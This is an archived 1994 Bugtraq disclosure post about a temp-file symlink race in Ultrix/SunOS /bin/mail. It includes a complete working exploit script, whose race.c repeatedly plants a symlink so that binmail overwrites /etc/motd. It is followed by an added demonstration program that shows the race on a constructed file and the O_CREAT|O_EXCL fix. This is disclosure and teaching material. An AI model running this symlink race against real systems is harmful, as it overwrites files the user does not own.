Bugtraq: /bin/mail Security Hole

/bin/mail Security Hole

From: Nathan Lawson <nlawson_at_galaxy.csc.calpoly.edu>
Date: Sat, 26 Nov 1994 00:42:09 -0800 (PST)

Hello all,

   I heard a lot of talk a while back about another two holes in binmail(1).
No one seemed to know or be willing to tell exactly what they were. I spent
some time doing "strings" on /bin/mail and guessed that it had several
problems. It used mktemp.c to make the temporary mailbox in /tmp and the lock
file in /usr/spool/mail (both unsafe paths). Since it also seemed to use
fopen.c for the actual file creation, I realized that a race definitely
existed. A few days ago, I heard rumors of an unreleased 8lgm script that
exploited these two holes. After a little mucking around, I worked out
the following script. I have been told that it works on Ultrix 4.2, as well
as SunOS 4.1.X. It exploits the tempfile race, but can easily be modified
to race with the lock file. I definitely recommend that all you
administrators who haven't upgraded to "mail.local.c" or procmail do so.

   Above all, FIX THIS HOLE. As to 8lgm, I definitely supported you in the
past, but turning to security through obscurity this late in the game is a
turn for the worse. If you have written an exploit, make it public, or do
NOT give it to anyone, not even your best friend's dog. There's a lesson to be
learned that has been repeated throughout history: give out copies to only
a few people, and the entire cracker community will get it. Let's see a
little more "all or nothing" commitment from the security community.

-Nate (nlawson_at_galaxy.calpoly.edu)

------------------------ cut here ----------------------------

#!/bin/sh
#
# This exploits a flaw in Ultrix/SunOS binmail(1), and attempts
# to embarrass the admin, by creating an motd entry.
#
# Written 1994 by Nate Lawson <nlawson_at_galaxy.calpoly.edu>
# Minor Revisions by Chris Ellwood <cellwood_at_gauss.calpoly.edu>
# Thanks go to 8lgm for the basic script format.

PATH=/usr/ucb:/usr/bin:/bin; export PATH
IFS=" "; export IFS
PROG="`basename $0`"
ME="`whoami`"
PWENT="I would fix this big hole guys!!!"
TARGET_FILE="/etc/motd"   # must match TARGET in race.c below

cat > race.c << 'EOF'

#define TARGET "/etc/motd"

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>

int main(void)
{
        unsigned int pid, bpid; /* Some machines don't have pid_t */
        int i;
        char target[13] = "/tmp/maa"; /* General format for binmail temp names;
                                         the unused tail is zero-filled, so the
                                         name stays NUL-terminated after the
                                         pid digits are written into it */

        if ((pid = fork()) == 0) {
                sleep(2);
                nice(19); /* Increase our chances and ... */
                execl("/bin/mail", "mail", (char *)0); /* Fork binmail */
                _exit(1); /* only reached if the exec failed */
        }

        bpid = pid; /* back up the child's pid for a later time */

        for (i = 11; i >= 8; i--) {
                target[i] = (pid % 10) + '0'; /* Make the name for the tempfile */
                pid /= 10;
        }
        while (!symlink(TARGET, target)) unlink(target);
                /* Point that mktemp()'d file to the pot of gold */
        while (symlink(TARGET, target)) unlink(target);
                /* Probably not necessary, but what the heck */

        kill(bpid, SIGHUP); /* Clean up, don't want to lag the system */
        return 0;
}

EOF

cc -O -s -o race race.c

# Check we now have race
if [ ! -x "race" ]; then
        echo "$PROG: couldn't compile race.c - lame!"
        exit 1
fi

# Field 4 of "ls -ld" is the size on the BSD-style ls of SunOS 4/Ultrix,
# which prints no group column by default.
OLD_TARGET_LEN=`ls -ld $TARGET_FILE 2>/dev/null | awk '{print $4}'`
NEW_TARGET_LEN=$OLD_TARGET_LEN

cp /usr/spool/mail/$ME /tmp/$$ # Backup the mail spool.. we need it
cp /dev/null /usr/spool/mail/$ME
echo "" >> /usr/spool/mail/$ME
echo $PWENT >> /usr/spool/mail/$ME
echo "" >> /usr/spool/mail/$ME

while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
     ./race &
     RACE_PID=$!
     sleep 4
     NEW_TARGET_LEN=`ls -ld $TARGET_FILE 2>/dev/null | awk '{print $4}'`
     kill -9 $RACE_PID
done

# We won the race
echo "Succeeded.."
# Add back our spool.. don't want to lose our mail.
cp /dev/null /usr/spool/mail/$ME
cp /tmp/$$ /usr/spool/mail/$ME
rm -f /tmp/$$ race race.c
exit 0
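The hole the post describes is a check-then-use gap: binmail picked a predictable /tmp name with mktemp(), which only tests that the name is currently free, and then created the file with a separate fopen() that follows whatever symlink has been planted at that name in between. The C program below is an added illustration for this page, not code from the post or from any binmail source. It replays that sequence against a constructed "protected" file inside a private scratch directory (the directory name, file names and content are all made up for the demo), with the attacker's entire move collapsed to a single symlink() call placed in the window, and then repeats it with the atomic O_CREAT|O_EXCL open that closes the window, which is the primitive mkstemp(3) is built on.

```c
#define _GNU_SOURCE /* exposes mkdtemp, lstat, symlink and O_NOFOLLOW on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#ifndef O_NOFOLLOW
#define O_NOFOLLOW 0 /* not exposed by this libc; O_EXCL alone closes the race */
#endif

/* Constructed stand-in for /etc/motd; its 15-byte length is what gets checked. */
#define PROTECTED_CONTENT "keep me intact\n"

/* Private scratch directory, the "protected" file inside it, and the predictable
 * temp name the attacker aims at (hypothetical; mirrors binmail's /tmp/maaNNNN). */
struct fixture { char dir[64], protected_path[128], temp_path[128]; };

static int fixture_init(struct fixture *f)
{
    FILE *fp;
    strcpy(f->dir, "/tmp/binmail-demo-XXXXXX");
    if (mkdtemp(f->dir) == NULL)
        return -1;
    snprintf(f->protected_path, sizeof f->protected_path, "%s/motd", f->dir);
    snprintf(f->temp_path, sizeof f->temp_path, "%s/maa0001", f->dir);
    if ((fp = fopen(f->protected_path, "w")) == NULL)
        return -1;
    fputs(PROTECTED_CONTENT, fp);
    return fclose(fp);
}

static void fixture_cleanup(const struct fixture *f)
{
    unlink(f->temp_path); unlink(f->protected_path); rmdir(f->dir);
}

/* The attacker's entire contribution, reduced to the one call that matters. */
static void attacker_plants_symlink(const struct fixture *f)
{
    if (symlink(f->protected_path, f->temp_path) != 0)
        perror("symlink");
}

/* The pattern the post describes: an mktemp()-style "is the name free?" check,
 * then a separate create that follows symlinks. The gap between is the window. */
static int create_check_then_open(const struct fixture *f)
{
    struct stat st;
    if (lstat(f->temp_path, &st) == 0) { errno = EEXIST; return -1; } /* the check */
    attacker_plants_symlink(f);                                      /* the window */
    return open(f->temp_path, O_WRONLY | O_CREAT | O_TRUNC, 0600);   /* the use */
}

/* The fix: one atomic create. O_CREAT|O_EXCL fails if any name, a symlink
 * included, already exists, so there is no check/use gap to slip into;
 * O_NOFOLLOW is defence in depth. mkstemp(3) is built on this combination. */
static int create_atomic(const struct fixture *f)
{
    attacker_plants_symlink(f); /* attacker still wins the timing; it no longer matters */
    return open(f->temp_path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Runs one scenario; returns the protected file's size afterwards (0 means it
 * was clobbered, -1 on setup failure) and reports whether open() succeeded. */
long run_scenario(int atomic, int *open_ok)
{
    struct fixture f;
    struct stat st;
    long size;
    int fd;

    if (fixture_init(&f) != 0)
        return -1;
    fd = atomic ? create_atomic(&f) : create_check_then_open(&f);
    *open_ok = (fd >= 0);
    if (fd >= 0)
        close(fd);
    size = (stat(f.protected_path, &st) == 0) ? (long)st.st_size : -1;
    fixture_cleanup(&f);
    return size;
}

int main(void)
{
    int ok;
    long size = run_scenario(0, &ok);
    printf("check-then-open: open() %s, protected file now %ld bytes\n",
           ok ? "succeeded" : "failed", size);
    size = run_scenario(1, &ok);
    printf("O_CREAT|O_EXCL:  open() %s, protected file still %ld bytes\n",
           ok ? "succeeded" : "failed", size);
    return 0;
}
```

Compile with `cc -o tempfile-race tempfile-race.c` and run it: the first line shows the check-then-open create succeeding through the symlink and truncating the protected file to 0 bytes, the second shows O_EXCL refusing with EEXIST and the file untouched at 15 bytes. The scratch directory is private rather than a sticky, world-writable /tmp so that the Linux fs.protected_symlinks restriction does not mask the result; that kernel knob is a useful extra barrier on a real system, not a substitute for creating temp files atomically.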
Received on Nov 26 1994
